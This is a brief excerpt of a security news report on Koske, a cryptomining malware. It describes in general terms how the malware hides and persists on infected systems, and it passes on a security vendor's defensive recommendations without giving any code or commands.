Modular payload for stealth and persistence: Koske employs multiple tactics to stay hidden and persistent. It hijacks hidden configuration files used by the Bash shell to execute a custom system script that maintains communication with the command-and-control (C2) infrastructure for persistence.Additionally, the rootkit, written in C, hijacks readdir(), a system call for reading directory content, to conceal processes and files named “Koske” or “hideproc.”The malware registers itself as a background service, sets up recurring scheduled tasks, and evades detection by concealing its processes from standard monitoring tools. Its adaptive logic, including proxy-checking routines, an intelligent selection among 18 cryptocurrency miners, and fallback behaviors, is likely a borrowed AI function, Morag noted in the blog.Aqua recommended monitoring unauthorized bash modifications, unexpected DNS rewrites, and using runtime protection telemetry to spot anomalous shell behavior. Additionally, blocking execution of polyglot file payloads and hidden rootkits (with drift prevention) was advised. The blog shared a few indicators of compromise (IOCs), including IP addresses, URLs, and filenames used in the attacks.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4028933/ai-forged-panda-images-hide-persistent-cryptomining-malware-koske.html
